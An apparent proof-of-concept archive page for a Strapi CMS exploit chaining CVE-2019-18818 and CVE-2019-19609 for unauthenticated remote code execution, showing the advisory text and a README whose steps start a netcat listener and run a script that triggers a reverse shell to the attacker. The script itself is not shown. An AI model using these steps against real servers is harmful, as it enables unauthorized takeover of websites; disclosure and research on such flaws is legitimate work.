Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2019-18818 PoC — strapi 授权问题漏洞

Source
Associated Vulnerability
Title:strapi 授权问题漏洞 (CVE-2019-18818)
Description:strapi before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.
Description
Exploit script showcasing a mixture of CVE-2019-18818 and CVE-2019-19609 for unauthenticated remote code execution in Strapi CMS.
Readme
# Strapi-RCE
Exploit script showcasing a mixture of [CVE-2019-18818](https://www.exploit-db.com/exploits/50237) and [CVE-2019-19609](https://www.exploit-db.com/exploits/50238) for unauthenticated remote code execution in Strapi CMS.

## Exploit

This script exploits a vulnerability in Strapi CMS versions 3.0.0-beta.17.4 and lower, allowing for unauthenticated remote code execution.

## Description

The exploit works by first leveraging a password reset vulnerability to obtain a JSON Web Token (JWT) for an administrative user. This token is then used to send a malicious payload to the Strapi CMS, which triggers a reverse shell back to the attacker's machine.

## How to Use

1. **Clone the Repository:**

   ```sh
   git clone https://github.com/Hackhoven/Strapi-RCE.git
   ```
2. **Navigate to the directory**
   
   ```sh
   cd Strapi-RCE/
   ```
3. **Set up a Netcat Listener**
   
   ```sh
   nc -nlvp <LPORT>
   ```
4. **Run the script with the target URL, local host ip address, and local host port as arguments**
   
   ```sh
   python3 strapi-rce.py <TARGET_URL> <LHOST> <LPORT>
   ```


## Disclaimer
This script is intended for educational purposes only. The author does not condone or support the use of this script for illegal or unethical activities. This script should only be used in legal security research or CTF environments. Use at your own risk.



---

Made by [Hackhoven](https://github.com/Hakchoven)
File Snapshot

[4.0K] /data/pocs/617fae2aa6966ff2d7f93b15513506c581f940b2 ├── [1.4K] README.md └── [2.3K] strapi-rce.py 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →